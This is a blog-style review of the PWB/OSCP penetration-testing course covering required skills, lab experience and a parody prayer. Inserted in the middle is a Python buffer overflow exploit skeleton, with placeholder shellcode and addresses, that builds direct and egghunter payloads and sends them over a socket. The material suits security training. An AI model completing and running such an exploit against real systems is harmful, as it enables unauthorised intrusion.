I took the PWB and that was a wild ride!
Lots of stuff covered in the screencasts; the same and some more in the course PDF.
This is not for the faint-hearted, though, and you need to have some developing skills in order to keep up with the speed (aka $End_of_lab_time – NOW()), as the labs really are the key.
- Developer's mindset: there is not enough time in the labs to teach you basic programming pragmatics, but you certainly can learn this upfront, and you should. Don't think you can learn this within 60 days if your biggest experience with a PC is Word and browsing Reddit.
- Linux skills. You really need to learn the CLI, (file) permissions, the environment, and compiling C and C++, thus also gcc.
- Shell scripting (Bash, but you can use any language you want with a shebang line).
- Python. A lot of exploits are written in the same style:
# shellcode in a var (possibly prefixed with an egghunter tag)
# optionally some egghunter code in another var
# a certain number of chars as the buffer to overflow on the target
# the return address (the address of a JMP ESP somewhere in the OS) in a var
# socket.send(buffer + returnaddress + shellcode)
or, if there's a need for an egghunter:
# socket.send(shellcode + (buffer - len(shellcode)) + returnaddress + egghunter)
You need to be comfortable with Python, its indentation, and tweaking exploits for other platforms, and you'll be creating tools of your own. I sometimes jumped the gun, though: when the course explained how Nmap works, I rapidly created a shell script to create logging/reports for each host while being able to scan whole subnets, only to find out about PBNJ in the next chapter.
- Perl, almost the same as above.
- Reporting. You need to document everything, not only for the customer, but also to find attack vectors and connections which you would not have seen otherwise.
- Patience. Seriously. You have to be able to enumerate, enumerate, catalog data, and enumerate some more. And if you have found a time-based MySQL injection which is only reliable with a sleep of 5 seconds, you will want a reverse shell ASAP, trust me.
But this is why the course’s credo is “Try Harder”.
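The exploit skeleton from the Python bullet above, written out as an added example (this is not code from the post or the course) so the plain layout and the egghunter layout can be compared side by side. The EIP offset, the JMP ESP address, the shellcode and the egghunter stub are all constructed placeholders, not values from any real target, and the hypothetical send_payload() is the socket.send() step; nothing connects anywhere unless you call it.

```python
import socket
import struct

# Constructed placeholders (NOT working shellcode or a real egghunter): only the
# layout matters here. In practice these come from msfvenom / the course material.
SHELLCODE = b"\xcc" * 32          # placeholder: 32 bytes of INT3
EGGHUNTER = b"\x90" * 32          # placeholder for a ~32-byte egghunter stub
EGG = b"w00t"                     # 4-byte tag; egghunters look for it twice in a row

# Hypothetical values: distance to the saved return address (pattern_create /
# pattern_offset) and a JMP ESP address in a non-ASLR module found in a debugger.
EIP_OFFSET = 260
JMP_ESP = 0x625011AF
BAD_CHARS = b"\x00\x0a\x0d"       # typical set for a text-based network protocol


def check_bad_chars(blob, bad_chars=BAD_CHARS):
    """Return the set of forbidden byte values present in blob (empty set = clean).
    Run this on the return address and shellcode before sending anything."""
    return {b for b in bad_chars if b in blob}


def build_direct_payload(offset, ret_addr, shellcode, nop_sled=16, filler=b"A"):
    """Layout: filler up to EIP, little-endian JMP ESP, NOP sled, shellcode.
    After the overwritten return address is popped, ESP points just past it,
    so JMP ESP lands in the sled and slides into the shellcode."""
    payload = filler * offset
    payload += struct.pack("<I", ret_addr)     # x86 is little-endian, hence "<I"
    payload += b"\x90" * nop_sled
    payload += shellcode
    return payload


def build_egghunter_payload(offset, ret_addr, egghunter, shellcode, egg=EGG, filler=b"A"):
    """Layout for when the space after EIP is too small for the shellcode:
    tagged shellcode at the START of the buffer, filler padding up to EIP,
    the JMP ESP address, then the small egghunter stub, which runs first and
    scans memory for egg*2 before jumping to the shellcode behind it."""
    egg_and_shellcode = egg * 2 + shellcode
    if len(egg_and_shellcode) > offset:
        raise ValueError("tagged shellcode does not fit in the space before EIP")
    payload = egg_and_shellcode
    payload += filler * (offset - len(egg_and_shellcode))  # the (buffer - len(shellcode)) part
    payload += struct.pack("<I", ret_addr)
    payload += egghunter
    return payload


def send_payload(host, port, payload, prefix=b"", timeout=5):
    """The socket.send() step. prefix is whatever protocol verb the target
    expects before the overflowing argument (hypothetical, target-specific)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.send(prefix + payload + b"\r\n")


if __name__ == "__main__":
    direct = build_direct_payload(EIP_OFFSET, JMP_ESP, SHELLCODE)
    hunter = build_egghunter_payload(EIP_OFFSET, JMP_ESP, EGGHUNTER, SHELLCODE)
    for name, p in (("direct", direct), ("egghunter", hunter)):
        print(name, len(p), "bytes; bad chars:", check_bad_chars(p) or "none")
```

The thing worth noticing is that both layouts put the return address at exactly the same offset; what changes is where the shellcode lives and what the four bytes after EIP point the CPU at. The egghunter variant is the answer to the classic "only 40 bytes of space after the overwrite" situation, and check_bad_chars() is the step that saves you an hour of wondering why a payload that looked right in the debugger never fires.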
The course taught me a lot and they did this in a fun way:
- Explain concept
- Practical approach to lab on target X
- “Now you try on Target Y. Hint: blabla”
- spend hours and hours spotting the difference and looking for that tiny, subtle thing
- r00t! And never forget
This really worked for me and I certainly won’t forget the stuff I learned the hard way.
Now for those doing the OSCP course:
Our Nmap who is in /usr/bin/,
Hallowed be thy enumeration,
Your scans will come,
your PBNJ reporting will be done,
on Kali, as it is in BackTrack 5.
Give us this day our holy apt-get upgrade,
and forgive us our network trespasses,
as we punish those who trespass against us,
and lead us not into temptation of the power of Nessus,
but deliver us our Wireshark logs.
For thine is the reporting,
and the scanning, and root for ever and ever.